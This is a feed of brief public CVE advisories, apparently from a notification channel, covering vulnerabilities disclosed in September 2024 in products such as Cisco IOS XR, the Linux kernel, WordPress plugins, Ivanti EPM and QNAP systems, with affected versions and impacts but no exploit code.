🚨 CVE-2024-20304A vulnerability in the multicast traceroute version 2 (Mtrace2) feature of Cisco IOS XR Software could allow an unauthenticated, remote attacker to exhaust the UDP packet memory of an affected device.This vulnerability exists because the Mtrace2 code does not properly handle packet memory. An attacker could exploit this vulnerability by sending crafted packets to an affected device. A successful exploit could allow the attacker to exhaust the incoming UDP packet memory. The affected device would not be able to process higher-level UDP-based protocols packets, possibly causing a denial of service (DoS) condition.Note: This vulnerability can be exploited using IPv4 or IPv6.🎖@cveNotify |
|
| 2024-09-12 12:37:32 |
🚨 CVE-2024-44974In the Linux kernel, the following vulnerability has been resolved:mptcp: pm: avoid possible UaF when selecting endpselect_local_address() and select_signal_address() both select anendpoint entry from the list inside an RCU protected section, but returna reference to it, to be read later on. If the entry is dereferencedafter the RCU unlock, reading info could cause a Use-after-Free.A simple solution is to copy the required info while inside the RCUprotected section to avoid any risk of UaF later. The address ID mightneed to be modified later to handle the ID0 case later, so a copy seemsOK to deal with.🎖@cveNotify |
|
| 2024-09-12 12:37:31 |
🚨 CVE-2024-43892In the Linux kernel, the following vulnerability has been resolved:memcg: protect concurrent access to mem_cgroup_idrCommit 73f576c04b94 ("mm: memcontrol: fix cgroup creation failure aftermany small jobs") decoupled the memcg IDs from the CSS ID space to fix thecgroup creation failures. It introduced IDR to maintain the memcg IDspace. The IDR depends on external synchronization mechanisms formodifications. For the mem_cgroup_idr, the idr_alloc() and idr_replace()happen within css callback and thus are protected through cgroup_mutexfrom concurrent modifications. However idr_remove() for mem_cgroup_idrwas not protected against concurrency and can be run concurrently fordifferent memcgs when they hit their refcnt to zero. Fix that.We have been seeing list_lru based kernel crashes at a low frequency inour fleet for a long time. These crashes were in different part oflist_lru code including list_lru_add(), list_lru_del() and reparentingcode. Upon further inspection, it looked like for a given object (dentryand inode), the super_block's list_lru didn't have list_lru_one for thememcg of that object. The initial suspicions were either the object isnot allocated through kmem_cache_alloc_lru() or somehowmemcg_list_lru_alloc() failed to allocate list_lru_one() for a memcg butreturned success. No evidence were found for these cases.Looking more deeply, we started seeing situations where valid memcg's idis not present in mem_cgroup_idr and in some cases multiple valid memcgshave same id and mem_cgroup_idr is pointing to one of them. So, the mostreasonable explanation is that these situations can happen due to racebetween multiple idr_remove() calls or race betweenidr_alloc()/idr_replace() and idr_remove(). These races are causingmultiple memcgs to acquire the same ID and then offlining of one of themwould cleanup list_lrus on the system for all of them. Later access fromother memcgs to the list_lru cause crashes due to missing list_lru_one.🎖@cveNotify |
|
| 2024-09-12 12:37:26 |
🚨 CVE-2024-42246In the Linux kernel, the following vulnerability has been resolved:net, sunrpc: Remap EPERM in case of connection failure in xs_tcp_setup_socketWhen using a BPF program on kernel_connect(), the call can return -EPERM. Thiscauses xs_tcp_setup_socket() to loop forever, filling up the syslog and causingthe kernel to potentially freeze up.Neil suggested: This will propagate -EPERM up into other layers which might not be ready to handle it. It might be safer to map EPERM to an error we would be more likely to expect from the network system - such as ECONNREFUSED or ENETDOWN.ECONNREFUSED as error seems reasonable. For programs setting a different errorcan be out of reach (see handling in 4fbac77d2d09) in particular on kernelswhich do not have f10d05966196 ("bpf: Make BPF_PROG_RUN_ARRAY return -errinstead of allow boolean"), thus given that it is better to simply remap forconsistent behavior. UDP does handle EPERM in xs_udp_send_request().🎖@cveNotify |
|
| 2024-09-12 12:37:25 |
🚨 CVE-2024-38577In the Linux kernel, the following vulnerability has been resolved:rcu-tasks: Fix show_rcu_tasks_trace_gp_kthread buffer overflowThere is a possibility of buffer overflow inshow_rcu_tasks_trace_gp_kthread() if counters, passedto sprintf() are huge. Counter numbers, needed for thisare unrealistically high, but buffer overflow is stillpossible.Use snprintf() with buffer size instead of sprintf().Found by Linux Verification Center (linuxtesting.org) with SVACE.🎖@cveNotify |
|
| 2024-09-12 09:37:31 |
🚨 CVE-2024-8529The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to SQL Injection via the 'c_fields' parameter of the /wp-json/lp/v1/courses/archive-course REST API endpoint in all versions up to, and including, 4.2.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-09-12 09:37:30 |
🚨 CVE-2024-2010Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in TE Informatics V5 allows Reflected XSS.This issue affects V5: before 6.2.🎖@cveNotify |
|
| 2024-09-12 06:37:33 |
🚨 CVE-2024-6887The Giveaways and Contests by RafflePress WordPress plugin before 1.12.16 does not sanitise and escape some of its Giveaways settings, which could allow high privilege users such as editor and above to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-09-12 06:37:25 |
🚨 CVE-2024-5799The CM Pop-Up Banners for WordPress plugin before 1.7.3 does not sanitise and escape some of its popup fields, which could allow high privilege users such as Contributors to perform Cross-Site Scripting attacks.🎖@cveNotify |
|
| 2024-09-12 06:37:24 |
🚨 CVE-2024-3163The Easy Property Listings WordPress plugin before 3.5.4 does not have CSRF check when deleting contacts in bulk, which could allow attackers to make a logged in admin delete them via a CSRF attack🎖@cveNotify |
|
| 2024-09-12 05:37:24 |
🚨 CVE-2024-45624Exposure of sensitive information due to incompatible policies issue exists in Pgpool-II. If a database user accesses a query cache, table data unauthorized for the user may be retrieved.🎖@cveNotify |
|
| 2024-09-12 04:37:24 |
🚨 CVE-2024-8711A vulnerability, which was classified as problematic, has been found in SourceCodester Food Ordering Management System 1.0. Affected by this issue is some unknown functionality of the file /includes/. The manipulation leads to exposure of information through directory listing. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-12 03:37:25 |
🚨 CVE-2024-8709A vulnerability classified as critical has been found in SourceCodester Best House Rental Management System 1.0. Affected is the function delete_user/save_user of the file /admin_class.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-12 03:37:24 |
🚨 CVE-2024-38222Microsoft Edge (Chromium-based) Information Disclosure Vulnerability🎖@cveNotify |
|
| 2024-09-12 02:37:32 |
🚨 CVE-2024-32846An unspecified SQL injection in Ivanti EPM before 2022 SU6, or the 2024 September update allows a remote authenticated attacker with admin privileges to achieve remote code execution.🎖@cveNotify |
|
| 2024-09-12 02:37:26 |
🚨 CVE-2024-32845An unspecified SQL injection in Ivanti EPM before 2022 SU6, or the 2024 September update allows a remote authenticated attacker with admin privileges to achieve remote code execution.🎖@cveNotify |
|
| 2024-09-12 02:37:25 |
🚨 CVE-2024-32840An unspecified SQL injection in Ivanti EPM before 2022 SU6, or the 2024 September update allows a remote authenticated attacker with admin privileges to achieve remote code execution.🎖@cveNotify |
|
| 2024-09-12 02:37:24 |
🚨 CVE-2024-29847Deserialization of untrusted data in the agent portal of Ivanti EPM before 2022 SU6, or the 2024 September update allows a remote unauthenticated attacker to achieve remote code execution.🎖@cveNotify |
|
| 2024-09-12 01:37:24 |
🚨 CVE-2024-8707A vulnerability was found in 云课网络科技有限公司 Yunke Online School System up to 3.0.6. It has been declared as problematic. This vulnerability affects the function downfile of the file application/admin/controller/Appadmin.php. The manipulation of the argument url leads to path traversal. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used.🎖@cveNotify |
|
| 2024-09-12 01:07:25 |
🚨 CVE-2024-38217Windows Mark of the Web Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-09-12 01:07:24 |
🚨 CVE-2024-38014Windows Installer Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2024-09-12 00:37:31 |
🚨 CVE-2024-28981Hitachi Vantara Pentaho Data Integration & Analytics versions before 10.1.0.0 and 9.3.0.8, including 8.3.x, discloses database passwords when searching metadata injectable fields.🎖@cveNotify |
|
| 2024-09-11 23:37:25 |
🚨 CVE-2024-7890Local privilege escalation allows a low-privileged user to gain SYSTEM privileges in Citrix Workspace app for Windows🎖@cveNotify |
|
| 2024-09-11 23:37:24 |
🚨 CVE-2024-7889Local privilege escalation allows a low-privileged user to gain SYSTEM privileges in Citrix Workspace app for Windows🎖@cveNotify |
|
| 2024-09-11 22:37:24 |
🚨 CVE-2024-0874A flaw was found in coredns. This issue could lead to invalid cache entries returning due to incorrectly implemented caching.🎖@cveNotify |
|
| 2024-09-11 21:37:26 |
🚨 CVE-2024-22920swftools 0.9.2 was discovered to contain a heap-use-after-free via the function bufferWriteData in swftools/lib/action/compile.c.🎖@cveNotify |
|
| 2024-09-11 21:37:25 |
🚨 CVE-2023-46322iTermSessionLauncher.m in iTerm2 before 3.5.0beta12 does not sanitize ssh hostnames in URLs. The hostname's initial character may be non-alphanumeric. The hostname's other characters may be outside the set of alphanumeric characters, dash, and period.🎖@cveNotify |
|
| 2024-09-11 21:37:24 |
🚨 CVE-2023-46321iTermSessionLauncher.m in iTerm2 before 3.5.0beta12 does not sanitize paths in x-man-page URLs. They may have shell metacharacters for a /usr/bin/man command line.🎖@cveNotify |
|
| 2024-09-11 20:37:36 |
🚨 CVE-2024-44574RELY-PCIe v22.2.1 to v23.1.0 was discovered to contain a command injection vulnerability via the sys_conf function.🎖@cveNotify |
|
| 2024-09-11 20:37:32 |
🚨 CVE-2024-27729Cross Site Scripting vulnerability in Friendica v.2023.12 allows a remote attacker to obtain sensitive information via the location parameter of the calendar event feature.🎖@cveNotify |
|
| 2024-09-11 20:37:31 |
🚨 CVE-2024-37286APM server logs contain document body from a partially failed bulk index request. For example, in case of unavailable_shards_exception for a specific document, since the ES response line contains the document body, and that APM server logs the ES response line on error, the document is effectively logged.🎖@cveNotify |
|
| 2024-09-11 20:37:30 |
🚨 CVE-2018-17558Hardcoded manufacturer credentials and an OS command injection vulnerability in the /cgi-bin/mft/ directory on ABUS TVIP TVIP20050 LM.1.6.18, TVIP10051 LM.1.6.18, TVIP11050 MG.1.6.03.05, TVIP20550 LM.1.6.18, TVIP10050 LM.1.6.18, TVIP11550 MG.1.6.03, TVIP21050 MG.1.6.03, and TVIP51550 MG.1.6.03 cameras allow remote attackers to execute code as root.🎖@cveNotify |
|
| 2024-09-11 20:37:27 |
🚨 CVE-2018-16739An issue was discovered on certain ABUS TVIP devices. Due to a path traversal in /opt/cgi/admin/filewrite, an attacker can write to files, and thus execute code arbitrarily with root privileges.🎖@cveNotify |
|
| 2024-09-11 20:37:26 |
🚨 CVE-2023-46346In the module "Product Catalog (CSV, Excel, XML) Export PRO" (exportproducts) in versions up to 4.1.1 from MyPrestaModules for PrestaShop, a guest can download personal information without restriction by performing a path traversal attack. Due to a lack of permissions control and a lack of control in the path name construction, a guest can perform a path traversal to view all files on the information system.🎖@cveNotify |
|
| 2024-09-11 20:37:25 |
🚨 CVE-2023-43961An issue in Dromara SaToken version 1.3.50RC and before when using Spring dynamic controllers, a specially crafted request may cause an authentication bypass.🎖@cveNotify |
|
| 2024-09-11 20:37:24 |
🚨 CVE-2023-33517carRental 1.0 is vulnerable to Incorrect Access Control (Arbitrary File Read on the Back-end System).🎖@cveNotify |
|
| 2024-09-11 20:07:25 |
🚨 CVE-2024-7506A vulnerability has been found in itsourcecode Tailoring Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /setlogo.php. The manipulation of the argument bgimg leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273649 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-09-11 20:07:24 |
🚨 CVE-2024-7505A vulnerability, which was classified as critical, was found in itsourcecode Bike Delivery System 1.0. Affected is an unknown function of the file contact_us_action.php. The manipulation of the argument name leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273648.🎖@cveNotify |
|
| 2024-09-11 19:37:30 |
🚨 CVE-2023-45554File Upload vulnerability in zzzCMS v.2.1.9 allows a remote attacker to execute arbitrary code via modification of the imageext parameter from jpg, jpeg,gif, and png to jpg, jpeg,gif, png, pphphp.🎖@cveNotify |
|
| 2024-09-11 19:37:26 |
🚨 CVE-2023-39740The leakage of the client secret in Onigiriya-musubee Line 13.6.1 allows attackers to obtain the channel access token and send crafted broadcast messages.🎖@cveNotify |
|
| 2024-09-11 19:37:25 |
🚨 CVE-2023-39732The leakage of the client secret in Tokueimaru_waiting Line 13.6.1 allows attackers to obtain the channel access token and send crafted broadcast messages.🎖@cveNotify |
|
| 2024-09-11 19:37:24 |
🚨 CVE-2023-46003I-doit pro 25 and below is vulnerable to Cross Site Scripting (XSS) via index.php.🎖@cveNotify |
|
| 2024-09-11 19:07:25 |
🚨 CVE-2024-42035Permission control vulnerability in the App Multiplier moduleImpact:Successful exploitation of this vulnerability may affect functionality and confidentiality.🎖@cveNotify |
|
| 2024-09-11 19:07:24 |
🚨 CVE-2024-42034LaunchAnywhere vulnerability in the account module.Impact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-09-11 18:37:32 |
🚨 CVE-2023-48957PureVPN Linux client 2.0.2-Productions fails to properly handle DNS queries, allowing them to bypass the VPN tunnel and be sent directly to the ISP or default DNS servers.🎖@cveNotify |
|
| 2024-09-11 18:37:25 |
🚨 CVE-2023-43509A vulnerability in the web-based management interface of ClearPass Policy Manager could allow an unauthenticated remote attacker to send notifications to computers that are running ClearPass OnGuard. These notifications can then be used to phish users or trick them into downloading malicious software.🎖@cveNotify |
|
| 2024-09-11 18:37:24 |
🚨 CVE-2023-43506A vulnerability in the ClearPass OnGuard Linux agent could allow malicious users on a Linux instance to elevate their user privileges to those of a higher role. A successful exploit allows malicious users to execute arbitrary code with root level privileges on the Linux instance.🎖@cveNotify |
|
| 2024-09-11 18:07:32 |
🚨 CVE-2024-41732SAP NetWeaver Application Server ABAP allows an unauthenticated attacker to craft a URL link that could bypass allowlist controls. Depending on the web applications provided by this server, the attacker might inject CSS code or links into the web application that could allow the attacker to read or modify information. There is no impact on availability of application.🎖@cveNotify |
|
| 2024-09-11 18:07:31 |
🚨 CVE-2024-0104NVIDIA Mellanox OS, ONYX, Skyway, MetroX-2 and MetroX-3 XC contain a vulnerability in the LDAP AAA component, where a user can cause improper access. A successful exploit of this vulnerability might lead to information disclosure, data tampering, and escalation of privileges.🎖@cveNotify |
|
| 2024-09-11 17:37:32 |
🚨 CVE-2024-39627Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Imagely NextGEN Gallery allows Stored XSS.This issue affects NextGEN Gallery: from n/a through 3.59.3.🎖@cveNotify |
|
| 2024-09-11 17:37:26 |
🚨 CVE-2018-6192In Artifex MuPDF 1.12.0, the pdf_read_new_xref function in pdf/pdf-xref.c allows remote attackers to cause a denial of service (segmentation violation and application crash) via a crafted pdf file.🎖@cveNotify |
|
| 2024-09-11 17:37:25 |
🚨 CVE-2017-9216libjbig2dec.a in Artifex jbig2dec 0.13, as used in MuPDF and Ghostscript, has a NULL pointer dereference in the jbig2_huffman_get function in jbig2_huffman.c. For example, the jbig2dec utility will crash (segmentation fault) when parsing an invalid file.🎖@cveNotify |
|
| 2024-09-11 17:37:24 |
🚨 CVE-2017-6060Stack-based buffer overflow in jstest_main.c in mujstest in Artifex Software, Inc. MuPDF 1.10a allows remote attackers to have unspecified impact via a crafted image.🎖@cveNotify |
|
| 2024-09-11 17:07:33 |
🚨 CVE-2024-6502An issue was discovered in GitLab CE/EE affecting all versions starting from 8.2 prior to 17.1.6 starting from 17.2 prior to 17.2.4, and starting from 17.3 prior to 17.3.1, which allows an attacker to create a branch with the same name as a deleted tag.🎖@cveNotify |
|
| 2024-09-11 17:07:26 |
🚨 CVE-2021-4441In the Linux kernel, the following vulnerability has been resolved:spi: spi-zynq-qspi: Fix a NULL pointer dereference in zynq_qspi_exec_mem_op()In zynq_qspi_exec_mem_op(), kzalloc() is directly used in memset(),which could lead to a NULL pointer dereference on failure ofkzalloc().Fix this bug by adding a check of tmpbuf.This bug was found by a static analyzer. The analysis employsdifferential checking to identify inconsistent security operations(e.g., checks or kfrees) between two code paths and confirms that theinconsistent operations are not recovered in the current function orthe callers, so they constitute bugs.Note that, as a bug found by static analysis, it can be a falsepositive or hard to trigger. Multiple researchers have cross-reviewedthe bug.Builds with CONFIG_SPI_ZYNQ_QSPI=m show no new warnings,and our static analyzer no longer warns about this code.🎖@cveNotify |
|
| 2024-09-11 17:07:25 |
🚨 CVE-2024-6913Execution with unnecessary privileges in PerkinElmer ProcessPlus allows an attacker to spawn a remote shell on the windows system.This issue affects ProcessPlus: through 1.11.6507.0.🎖@cveNotify |
|
| 2024-09-11 17:07:24 |
🚨 CVE-2024-6912Use of hard-coded MSSQL credentials in PerkinElmer ProcessPlus on Windows allows an attacker to login remove on all prone installations.This issue affects ProcessPlus: through 1.11.6507.0.🎖@cveNotify |
|
| 2024-09-11 16:37:33 |
🚨 CVE-2021-1246Cisco Finesse, Cisco Virtualized Voice Browser, and Cisco Unified CVP OpenSocial Gadget Editor Unauthenticated Access VulnerabilityA vulnerability in the web management interface of Cisco Finesse, Cisco Virtualized Voice Browser, and Cisco Unified CVP could allow an unauthenticated, remote attacker to access the OpenSocial Gadget Editor without providing valid user credentials.The vulnerability is due to missing authentication for a specific section of the web-based management interface. An attacker could exploit this vulnerability by accessing a crafted URL. A successful exploit could allow the attacker to obtain access to a section of the interface, which they could use to obtain potentially confidential information and create arbitrary XML files.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.🎖@cveNotify |
|
| 2024-09-11 16:37:26 |
🚨 CVE-2019-6131svg-run.c in Artifex MuPDF 1.14.0 has infinite recursion with stack consumption in svg_run_use_symbol, svg_run_element, and svg_run_use, as demonstrated by mutool.🎖@cveNotify |
|
| 2024-09-11 16:37:25 |
🚨 CVE-2018-1000051Artifex Mupdf version 1.12.0 contains a Use After Free vulnerability in fz_keep_key_storable that can result in DOS / Possible code execution. This attack appear to be exploitable via Victim opens a specially crafted PDF.🎖@cveNotify |
|
| 2024-09-11 16:07:40 |
🚨 CVE-2024-8584Orca HCM from LEARNING DIGITAL does not properly restrict access to a specific functionality, allowing unauthenticated remote attacker to exploit this functionality to create an account with administrator privilege and subsequently use it to log in.🎖@cveNotify |
|
| 2024-09-11 16:07:36 |
🚨 CVE-2024-42341Loway - CWE-601: URL Redirection to Untrusted Site ('Open Redirect')🎖@cveNotify |
|
| 2024-09-11 16:07:35 |
🚨 CVE-2024-8571A vulnerability was found in erjemin roll_cms up to 1484fe2c4e0805946a7bcf46218509fcb34883a9. It has been classified as problematic. This affects an unknown part of the file roll_cms/roll_cms/views.py. The manipulation leads to information exposure through error message. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available.🎖@cveNotify |
|
| 2024-09-11 16:07:31 |
🚨 CVE-2022-48894In the Linux kernel, the following vulnerability has been resolved:iommu/arm-smmu-v3: Don't unregister on shutdownSimilar to SMMUv2, this driver calls iommu_device_unregister() from theshutdown path, which removes the IOMMU groups with no coordinationwhatsoever with their users - shutdown methods are optional in devicedrivers. This can lead to NULL pointer dereferences in those drivers'DMA API calls, or worse.Instead of calling the full arm_smmu_device_remove() fromarm_smmu_device_shutdown(), let's pick only the relevant function call -arm_smmu_device_disable() - more or less the reverse ofarm_smmu_device_reset() - and call just that from the shutdown path.🎖@cveNotify |
|
| 2024-09-11 16:07:30 |
🚨 CVE-2024-7325A vulnerability was found in IObit Driver Booster 11.0.0.0. It has been rated as critical. Affected by this issue is some unknown functionality in the library VCL120.BPL of the component BPL Handler. The manipulation leads to uncontrolled search path. Attacking locally is a requirement. The identifier of this vulnerability is VDB-273248. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-09-11 16:07:26 |
🚨 CVE-2024-39379Acrobat for Edge versions 126.0.2592.81 and earlier are affected by an out-of-bounds read vulnerability that could lead to arbitrary file system read access. An attacker could exploit this vulnerability to read contents from a location in memory past the buffer boundary, potentially leading to sensitive information disclosure. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2024-09-11 16:07:25 |
🚨 CVE-2024-32671Heap-based Buffer Overflow vulnerability in Samsung Open Source Escargot JavaScript engine allows Overflow Buffers.This issue affects Escargot: 4.0.0.🎖@cveNotify |
|
| 2024-09-11 16:07:24 |
🚨 CVE-2024-39688Bert-VITS2 is the VITS2 Backbone with multilingual bert. User input supplied to the data_dir variable is concatenated with other folders and used to open a new file in the generate_config function, which leads to a limited file write. The issue allows for writing /config/config.json file in arbitrary directory on the server. If a given directory path doesn’t exist, the application will return an error, so this vulnerability could also be used to gain information about existing directories on the server. This affects fishaudio/Bert-VITS2 2.3 and earlier.🎖@cveNotify |
|
| 2024-09-11 15:38:05 |
🚨 CVE-2024-38217Windows Mark of the Web Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2024-09-11 15:07:56 |
🚨 CVE-2024-7480An Improper access control vulnerability was found in Avaya Aura System Manager which could allow a command-line interface (CLI) user with administrative privileges to read arbitrary files on the system. Affected versions include 10.1.x.x and 10.2.x.x. Versions prior to 10.1 are end of manufacturer support.🎖@cveNotify |
|
| 2024-09-11 15:07:55 |
🚨 CVE-2024-7477A SQL injection vulnerability was found which could allow a command line interface (CLI) user with administrative privileges to execute arbitrary queries against the Avaya Aura System Manager database. Affected versions include 10.1.x.x and 10.2.x.x. Versions prior to 10.1 are end of manufacturer support.🎖@cveNotify |
|
| 2024-09-11 15:07:51 |
🚨 CVE-2024-7436A vulnerability, which was classified as critical, has been found in D-Link DI-8100 16.07. This issue affects the function msp_info_htm of the file msp_info.htm. The manipulation of the argument cmd leads to command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273521 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-09-11 15:07:50 |
🚨 CVE-2024-28298SQL injection vulnerability in BM SOFT BMPlanning 1.0.0.1 allows authenticated users to execute arbitrary SQL commands via the SEC_IDF, LIE_IDF, PLANF_IDF, CLI_IDF, DOS_IDF, and possibly other parameters to /BMServerR.dll/BMRest.🎖@cveNotify |
|
| 2024-09-11 15:07:49 |
🚨 CVE-2024-41127Monkeytype is a minimalistic and customizable typing test. Monkeytype is vulnerable to Poisoned Pipeline Execution through Code Injection in its ci-failure-comment.yml GitHub Workflow, enabling attackers to gain pull-requests write access. The ci-failure-comment.yml workflow is triggered when the Monkey CI workflow completes. When it runs, it will download an artifact uploaded by the triggering workflow and assign the contents of ./pr_num/pr_num.txt artifact to the steps.pr_num_reader.outputs.content WorkFlow variable. It is not validated that the variable is actually a number and later it is interpolated into a JS script allowing an attacker to change the code to be executed. This issue leads to pull-requests write access. This vulnerability is fixed in 24.30.0.🎖@cveNotify |
|
| 2024-09-11 15:07:45 |
🚨 CVE-2024-41131ImageSharp is a 2D graphics API. An Out-of-bounds Write vulnerability has been found in the ImageSharp gif decoder, allowing attackers to cause a crash using a specially crafted gif. This can potentially lead to denial of service. All users are advised to upgrade to v3.1.5 or v2.1.9.🎖@cveNotify |
|
| 2024-09-11 15:07:44 |
🚨 CVE-2024-29073An vulnerability in the handling of Latex exists in Ankitects Anki 24.04. When Latex is sanitized to prevent unsafe commands, the verbatim package, which comes installed by default in many Latex distributions, has been overlooked. A specially crafted flashcard can lead to an arbitrary file read. An attacker can share a flashcard to trigger this vulnerability.🎖@cveNotify |
|
| 2024-09-11 15:07:43 |
🚨 CVE-2024-26020An arbitrary script execution vulnerability exists in the MPV functionality of Ankitects Anki 24.04. A specially crafted flashcard can lead to a arbitrary code execution. An attacker can send malicious flashcard to trigger this vulnerability.🎖@cveNotify |
|
| 2024-09-11 14:08:04 |
🚨 CVE-2024-28799IBM QRadar Suite Software 1.10.12.0 through 1.10.23.0 and IBM Cloud Pak for Security 1.10.0.0 through 1.10.11.0 displays sensitive data improperly during back-end commands which may result in the unexpected disclosure of this information. IBM X-Force ID: 287173.🎖@cveNotify |
|
| 2024-09-11 14:07:58 |
🚨 CVE-2024-27267The Object Request Broker (ORB) in IBM SDK, Java Technology Edition 7.1.0.0 through 7.1.5.18 and 8.0.0.0 through 8.0.8.26 is vulnerable to remote denial of service, caused by a race condition in the management of ORB listener threads. IBM X-Force ID: 284573.🎖@cveNotify |
|
| 2024-09-11 14:07:57 |
🚨 CVE-2023-32471Dell Edge Gateway BIOS, versions 3200 and 5200, contains an out-of-bounds read vulnerability. A local authenticated malicious user with high privileges could potentially exploit this vulnerability to read contents of stack memory and use this information for further exploits.🎖@cveNotify |
|
| 2024-09-11 14:07:56 |
🚨 CVE-2023-32466Dell Edge Gateway BIOS, versions 3200 and 5200, contains an out-of-bounds write vulnerability. A local authenticated malicious user with high privileges could potentially exploit this vulnerability leading to exposure of some UEFI code, leading to arbitrary code execution or escalation of privilege.🎖@cveNotify |
|
| 2024-09-11 14:07:52 |
🚨 CVE-2024-27129A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to execute code via a network.We have already fixed the vulnerability in the following version:QTS 5.1.7.2770 build 20240520 and laterQuTS hero h5.1.7.2770 build 20240520 and later🎖@cveNotify |
|
| 2024-09-11 14:07:51 |
🚨 CVE-2024-21902An incorrect permission assignment for critical resource vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to read or modify the resource via a network.We have already fixed the vulnerability in the following version:QTS 5.1.7.2770 build 20240520 and laterQuTS hero h5.1.7.2770 build 20240520 and later🎖@cveNotify |
|
| 2024-09-11 13:38:00 |
🚨 CVE-2024-22217A Server-Side Request Forgery (SSRF) vulnerability in Terminalfour before 8.3.19 allows authenticated users to use specific features to access internal services including sensitive information on the server that Terminalfour runs on.🎖@cveNotify |
|
| 2024-09-11 13:37:54 |
🚨 CVE-2024-39818Protection mechanism failure for some Zoom Workplace Apps and SDKs may allow an authenticated user to conduct information disclosure via network access.🎖@cveNotify |
|
| 2024-09-11 13:37:53 |
🚨 CVE-2023-50362A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to execute code via a network.We have already fixed the vulnerability in the following versions:QTS 5.1.6.2722 build 20240402 and laterQuTS hero h5.1.6.2734 build 20240414 and later🎖@cveNotify |
|
| 2024-09-11 13:37:52 |
🚨 CVE-2023-50361A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to execute code via a network.We have already fixed the vulnerability in the following versions:QTS 5.1.6.2722 build 20240402 and laterQuTS hero h5.1.6.2734 build 20240414 and later🎖@cveNotify |
|
| 2024-09-11 13:07:57 |
🚨 CVE-2024-43381reNgine is an automated reconnaissance framework for web applications. Versions 2.1.2 and prior are susceptible to Stored Cross-Site Scripting (XSS) attacks. This vulnerability occurs when scanning a domain, and if the target domain's DNS record contains an XSS payload, it leads to the execution of malicious scripts in the reNgine's dashboard view when any user views the scan results. The XSS payload is directly fetched from the DNS record of the remote target domain. Consequently, an attacker can execute the attack without requiring any additional input from the target or the reNgine user. A patch is available and expected to be part of version 2.1.3.🎖@cveNotify |
|
| 2024-09-11 13:07:56 |
🚨 CVE-2024-7868In Xpdf 4.05 (and earlier), invalid header info in a DCT (JPEG) stream can lead to an uninitialized variable in the DCT decoder. The proof-of-concept PDF file causes a segfault attempting to read from an invalid address.🎖@cveNotify |
|
| 2024-09-11 12:37:32 |
🚨 CVE-2024-5416The Elementor Website Builder – More than Just a Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the url parameter of multiple widgets in all versions up to, and including, 3.23.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in Elementor Editor pages. This was partially patched in version 3.23.2.🎖@cveNotify |
|
| 2024-09-11 12:37:25 |
🚨 CVE-2024-45786This vulnerability exists in Reedos aiM-Star version 2.0.1 due to improper access controls on its certain API endpoints. An authenticated remote attacker could exploit this vulnerability by manipulating a parameter through API request URL which could lead to gain unauthorized access to sensitive information belonging to other users.🎖@cveNotify |
|
| 2024-09-11 12:37:24 |
🚨 CVE-2024-43275Cross-Site Request Forgery (CSRF) vulnerability in xyzscripts.Com Insert PHP Code Snippet.This issue affects Insert PHP Code Snippet: from n/a through 1.3.6.🎖@cveNotify |
|
| 2024-09-11 11:37:32 |
🚨 CVE-2024-34457On versions before 2.1.4, after a regular user successfully logs in, they can manually make a request using the authorization token to view everyone's user flink information, including executeSQL and config.Mitigation:all users should upgrade to 2.1.4🎖@cveNotify |
|
| 2024-09-11 11:37:26 |
🚨 CVE-2024-5953A denial of service vulnerability was found in the 389-ds-base LDAP server. This issue may allow an authenticated user to cause a server denial of service while attempting to log in with a user with a malformed hash in their password.🎖@cveNotify |
|
| 2024-09-11 11:37:25 |
🚨 CVE-2017-1000253Linux distributions that have not patched their long-term kernels with https://git.kernel.org/linus/a87938b2e246b81b4fb713edb371a9fa3c5c3c86 (committed on April 14, 2015). This kernel vulnerability was fixed in April 2015 by commit a87938b2e246b81b4fb713edb371a9fa3c5c3c86 (backported to Linux 3.10.77 in May 2015), but it was not recognized as a security threat. With CONFIG_ARCH_BINFMT_ELF_RANDOMIZE_PIE enabled, and a normal top-down address allocation strategy, load_elf_binary() will attempt to map a PIE binary into an address range immediately below mm->mmap_base. Unfortunately, load_elf_ binary() does not take account of the need to allocate sufficient space for the entire binary which means that, while the first PT_LOAD segment is mapped below mm->mmap_base, the subsequent PT_LOAD segment(s) end up being mapped above mm->mmap_base into the are that is supposed to be the "gap" between the stack and the binary.🎖@cveNotify |
|
| 2024-09-11 11:37:24 |
